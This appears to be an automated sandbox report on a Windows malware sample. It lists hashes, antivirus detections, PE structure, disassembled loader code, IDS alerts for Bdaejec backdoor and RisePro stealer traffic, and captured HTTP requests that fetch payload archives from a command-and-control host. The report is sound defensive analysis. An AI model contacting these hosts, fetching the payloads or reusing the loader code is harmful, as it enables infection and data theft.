                                MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 92%
                                • Antivirus: Virustotal, Detection: 90%, Browse
                                Joe Sandbox View:
                                • Filename: Lisect_AVT_24003_G1A_84.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_90.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_35.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_54.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_55.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_37.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_79.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_70.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_72.exe, Detection: malicious, Browse
                                • Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                File Type:ASCII text, with no line terminators
                                Category:modified
                                Size (bytes):13
                                Entropy (8bit):2.6612262562697895
                                Encrypted:false
                                SSDEEP:3:LEfU5Cc:4U5Cc
                                MD5:D19A28CE09FDF2E8A14E0255A35896DA
                                SHA1:9CD9C0C7E40DF47C975353251DBF26ED54529BB1
                                SHA-256:0B0D335AC7FEDDDFAE67ADA782ED1FCE32A467B4D8EB466EB0854203C8044F24
                                SHA-512:57EA12DCC53139210E4107CE0AF322A1B1DDBEC640F39AB6E0365569E43E9E8B7BE92FE5E61C7154DBD68DB4F7AC2B619F890DBEDD84DBDD2C0629409C7F5F32
                                Malicious:false
                                Preview:1721881057279
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.4220933849024755
                                Encrypted:false
                                SSDEEP:6144:GSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN00uhiTw:lvloTMW+EZMM6DFy603w
                                MD5:451C0395A6EC9BFC4189BA911FB38341
                                SHA1:5A816D00C495B13086502FFB9071A1DF69A231E5
                                SHA-256:2B65BC0C941A719CE65AEEE3F3F1812956CE2EB88E0D389F51E244548EFDCCC6
                                SHA-512:ACBB6009E83A8E9F4857A0FD12F7E339C60BE1629D98C5FD0FC69E807855D5EC6A64B233C29C565C669AB7C29D2784623B1712FE9D4211562D2CFDB149363484
                                Malicious:false
                                Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6P%.@................................................................................................................................................................................................................................................................................................................................................D3+........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.971437934868994
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Lisect_AVT_24003_G1A_89.exe
                                File size:3'146'240 bytes
                                MD5:ee50f2db274c7abdbae3713a14020c24
                                SHA1:312af659d98d04b23c6ab5f5324604fd04a96777
                                SHA256:60285015f8b5e32f20411d30b7c64d8748827409275f5a42053b307bc2ff17de
                                SHA512:bbacd094942f9493d58367d19bf5573331d40c7cd96a2b0d4a787de215e9c3c509c1f2f168b2e632c55686b41ae72713abbe9214c04c889f8d3f18ecda9b6b11
                                SSDEEP:49152:27lf5RZ4Q9FDCjZtjBJBMndpCqYiCZG5uvmmAwYU9fF4nbGs/cSqyVU5jX:27lf5RWxfaHCqhCZ3dAwY+fFGqnX
                                TLSH:ACE533CDAC424837DB05267810D3F6B9026FFC80AD5921DB3DEABF67B672F290526119
                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....
                                Icon Hash:7192ecece8b2924d
                                Entrypoint:0xf2a000
                                Entrypoint Section:pL~u
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x65CC7EFE [Wed Feb 14 08:51:10 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:59aeb10eab81e92b5597d86d6e338bce
                                Instruction
                                push ebp
                                mov ebp, esp
                                sub esp, 0000016Ch
                                xor eax, eax
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [ebp-24h], eax
                                mov dword ptr [ebp-10h], eax
                                mov dword ptr [ebp-14h], eax
                                mov dword ptr [ebp-08h], eax
                                mov dword ptr [ebp-0Ch], eax
                                mov dword ptr [ebp-20h], eax
                                mov dword ptr [ebp-18h], eax
                                mov dword ptr [ebp-48h], 5A59486Ah
                                mov dword ptr [ebp-44h], 652E6F6Bh
                                mov dword ptr [ebp-40h], 00006578h
                                mov dword ptr [ebp-3Ch], 00000000h
                                call 00007F7F94CEE575h
                                pop eax
                                add eax, 00000225h
                                mov dword ptr [ebp-04h], eax
                                mov eax, dword ptr fs:[00000030h]
                                mov dword ptr [ebp-28h], eax
                                mov eax, dword ptr [ebp-04h]
                                mov dword ptr [eax], E904C483h
                                mov eax, dword ptr [ebp-04h]
                                mov dword ptr [eax+04h], FFFFDB4Bh
                                mov eax, dword ptr [ebp-28h]
                                mov eax, dword ptr [eax+0Ch]
                                mov eax, dword ptr [eax+1Ch]
                                mov eax, dword ptr [eax]
                                mov eax, dword ptr [eax+08h]
                                mov ecx, dword ptr [eax+3Ch]
                                mov ecx, dword ptr [ecx+eax+78h]
                                add ecx, eax
                                mov edi, dword ptr [ecx+1Ch]
                                mov ebx, dword ptr [ecx+20h]
                                mov esi, dword ptr [ecx+24h]
                                mov ecx, dword ptr [ecx+18h]
                                add esi, eax
                                add edi, eax
                                add ebx, eax
                                xor edx, edx
                                mov dword ptr [ebp-30h], esi
                                mov dword ptr [ebp-1Ch], edx
                                mov dword ptr [ebp-34h], ecx
                                cmp edx, dword ptr [ebp-34h]
                                jnc 00007F7F94CEE6BEh
                                movzx ecx, word ptr [esi+edx*2]
                                mov edx, dword ptr [ebx+edx*4]
                                mov esi, dword ptr [edi+ecx*4]
                                add edx, eax
                                mov ecx, dword ptr [edx]
                                add esi, eax
                                cmp ecx, 4D746547h
                                jne 00007F7F94CEE5C4h
                                cmp dword ptr [edx+04h], 6C75646Fh
                                jne 00007F7F94CEE5BBh
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x9000200xe0c.data
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x900e2c0x378.data
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1510000x10da0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9000000xc.data
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x10b0000x7340055eb848ba0d31b5538ce5486a56747e9False0.9996907199023861data7.999515690267131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x10c0000x270000x12200dbaef748bb072fcaeafb597e7e78824cFalse0.9966460129310345data7.995045563532632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x1330000x40000x8005b9c17d7889e8d1261c1dd6a3f5a5573False0.88623046875data7.346914669025697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x1370000x110000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x1480000x90000x6400feee1463b66ca3a8a5e67afaf52a4684False0.9948046875data7.987242582491748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x1510000x110000x10e00af15247632839c1539654f4d4d669c09False0.11179108796296296data4.305657895869023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                0x1620000x79b0000x328005a48e2befa059bbdc043084df1f8a31bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .data0x8fd0000x22d0000x22c400e6e41b73c1aeeacace7bd5a34f59e138unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                pL~u0xb2a0000x50000x420072cb13911ac8d0f38dd852ec17042113False0.7775213068181818data6.934637589599884IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x1511300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mRussianRussia0.10367620962971726
                                RT_GROUP_ICON0x1619580x14dataRussianRussia1.15
                                RT_VERSION0x16196c0x2b4dataRussianRussia0.48121387283236994
                                RT_MANIFEST0x161c200x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                DLLImport
                                kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                user32.dllMessageBoxA
                                advapi32.dllRegCloseKey
                                oleaut32.dllSysFreeString
                                gdi32.dllCreateFontA
                                shell32.dllShellExecuteA
                                version.dllGetFileVersionInfoA
                                ole32.dllCoInitializeEx
                                WS2_32.dllWSAStartup
                                CRYPT32.dllCryptUnprotectData
                                SHLWAPI.dllPathFindExtensionA
                                gdiplus.dllGdiplusStartup
                                SETUPAPI.dllSetupDiEnumDeviceInterfaces
                                ntdll.dllRtlUnicodeStringToAnsiString
                                Language of compilation systemCountry where language is spokenMap
                                RussianRussia
                                EnglishUnited States
                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                2024-07-25T05:10:44.519984+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49732799192.168.2.544.221.84.105
                                2024-07-25T05:09:55.531590+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49704799192.168.2.544.221.84.105
                                2024-07-25T05:10:31.462461+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4972850500192.168.2.5193.233.132.62
                                2024-07-25T05:10:02.223135+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49707799192.168.2.544.221.84.105
                                2024-07-25T05:10:00.675949+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4970550500192.168.2.5193.233.132.62
                                2024-07-25T05:10:30.346508+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49727799192.168.2.544.221.84.105
                                2024-07-25T05:10:13.800528+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971620.114.59.183192.168.2.5
                                2024-07-25T05:09:59.332194+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49706799192.168.2.544.221.84.105
                                2024-07-25T05:10:06.727757+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4970950500192.168.2.5193.233.132.62
                                2024-07-25T05:10:51.379391+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973320.114.59.183192.168.2.5
                                2024-07-25T05:10:06.727684+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4970850500192.168.2.5193.233.132.62
                                2024-07-25T05:10:38.238368+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49730799192.168.2.544.221.84.105
                                2024-07-25T05:10:34.439275+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4972850500192.168.2.5193.233.132.62
                                2024-07-25T05:10:32.891475+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49729799192.168.2.544.221.84.105
                                2024-07-25T05:10:03.590242+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4970950500192.168.2.5193.233.132.62
                                2024-07-25T05:10:23.933973+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49726443192.168.2.552.182.143.212
                                2024-07-25T05:09:57.684082+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4970550500192.168.2.5193.233.132.62
                                2024-07-25T05:09:54.991218+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5090853192.168.2.51.1.1.1
                                2024-07-25T05:10:41.347942+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49731799192.168.2.544.221.84.105
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 25, 2024 05:09:55.117422104 CEST49704799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:55.122926950 CEST7994970444.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:55.123014927 CEST49704799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:55.123308897 CEST49704799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:55.128104925 CEST7994970444.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:55.531443119 CEST7994970444.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:55.531498909 CEST7994970444.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:55.531589985 CEST49704799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:55.531589985 CEST49704799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:55.536416054 CEST49704799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:55.544678926 CEST7994970444.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:57.656136036 CEST4970550500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:09:57.661251068 CEST5050049705193.233.132.62192.168.2.5
                                Jul 25, 2024 05:09:57.661364079 CEST4970550500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:09:57.684082031 CEST4970550500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:09:57.689079046 CEST5050049705193.233.132.62192.168.2.5
                                Jul 25, 2024 05:09:58.937748909 CEST49706799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:58.943672895 CEST7994970644.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:58.943770885 CEST49706799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:58.946476936 CEST49706799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:58.952425957 CEST7994970644.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:59.332101107 CEST7994970644.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:59.332175970 CEST7994970644.221.84.105192.168.2.5
                                Jul 25, 2024 05:09:59.332194090 CEST49706799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:59.332377911 CEST49706799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:59.333844900 CEST49706799192.168.2.544.221.84.105
                                Jul 25, 2024 05:09:59.338924885 CEST7994970644.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:00.675949097 CEST4970550500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:00.680938005 CEST5050049705193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:01.824809074 CEST49707799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:01.829797029 CEST7994970744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:01.829910994 CEST49707799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:01.830205917 CEST49707799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:01.842729092 CEST7994970744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:02.222946882 CEST7994970744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:02.223134995 CEST49707799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:02.223145008 CEST7994970744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:02.223205090 CEST49707799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:02.228444099 CEST49707799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:02.233484030 CEST7994970744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:03.554466963 CEST4970850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:03.559318066 CEST5050049708193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:03.559427023 CEST4970850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:03.562728882 CEST4970950500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:03.567610979 CEST5050049709193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:03.567722082 CEST4970950500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:03.572550058 CEST4970850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:03.577441931 CEST5050049708193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:03.590241909 CEST4970950500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:03.597474098 CEST5050049709193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:06.727684021 CEST4970850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:06.727756977 CEST4970950500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:06.733149052 CEST5050049708193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:06.733174086 CEST5050049709193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:19.044802904 CEST5050049705193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:19.044929981 CEST4970550500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:24.946496964 CEST5050049709193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:24.947161913 CEST4970950500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:24.947871923 CEST5050049708193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:24.947925091 CEST4970850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:29.935900927 CEST49727799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:29.941032887 CEST7994972744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:29.941102982 CEST49727799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:29.968799114 CEST49727799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:29.973977089 CEST7994972744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:30.346431971 CEST7994972744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:30.346488953 CEST7994972744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:30.346508026 CEST49727799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:30.346551895 CEST49727799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:30.347642899 CEST49727799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:30.352441072 CEST7994972744.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:31.446198940 CEST4972850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:31.451281071 CEST5050049728193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:31.451483965 CEST4972850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:31.462460995 CEST4972850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:31.468023062 CEST5050049728193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:32.498847008 CEST49729799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:32.503947020 CEST7994972944.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:32.504055977 CEST49729799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:32.504376888 CEST49729799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:32.511382103 CEST7994972944.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:32.891344070 CEST7994972944.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:32.891412020 CEST7994972944.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:32.891474962 CEST49729799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:32.892200947 CEST49729799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:32.892719984 CEST49729799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:32.897531033 CEST7994972944.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:34.439275026 CEST4972850500192.168.2.5193.233.132.62
                                Jul 25, 2024 05:10:34.444552898 CEST5050049728193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:36.778986931 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:37.782700062 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:37.839551926 CEST7994973044.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:37.839643955 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:37.839806080 CEST7994973044.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:37.839843988 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:37.840507030 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:37.845310926 CEST7994973044.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:38.238248110 CEST7994973044.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:38.238270998 CEST7994973044.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:38.238368034 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:38.239454985 CEST49730799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:38.244259119 CEST7994973044.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:40.925246000 CEST49731799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:40.930217028 CEST7994973144.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:40.930321932 CEST49731799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:40.968962908 CEST49731799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:40.973812103 CEST7994973144.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:41.347846985 CEST7994973144.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:41.347942114 CEST49731799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:41.347970963 CEST7994973144.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:41.348026991 CEST49731799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:41.348862886 CEST49731799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:41.353646994 CEST7994973144.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:44.095956087 CEST49732799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:44.101151943 CEST7994973244.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:44.101273060 CEST49732799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:44.101511002 CEST49732799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:44.106270075 CEST7994973244.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:44.519879103 CEST7994973244.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:44.519984007 CEST49732799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:44.519989014 CEST7994973244.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:44.520148993 CEST49732799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:44.521239996 CEST49732799192.168.2.544.221.84.105
                                Jul 25, 2024 05:10:44.526108027 CEST7994973244.221.84.105192.168.2.5
                                Jul 25, 2024 05:10:52.825170040 CEST5050049728193.233.132.62192.168.2.5
                                Jul 25, 2024 05:10:52.825249910 CEST4972850500192.168.2.5193.233.132.62
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 25, 2024 05:09:54.991218090 CEST5090853192.168.2.51.1.1.1
                                Jul 25, 2024 05:09:55.086487055 CEST53509081.1.1.1192.168.2.5
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 25, 2024 05:09:54.991218090 CEST192.168.2.51.1.1.10x7868Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 25, 2024 05:09:55.086487055 CEST1.1.1.1192.168.2.50x7868No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                • ddos.dnsnb8.net:799
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54970444.221.84.1057996484C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:09:55.123308897 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.54970644.221.84.1057996484C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:09:58.946476936 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.54970744.221.84.1057996484C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:10:01.830205917 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.54972744.221.84.1057992516C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:10:29.968799114 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
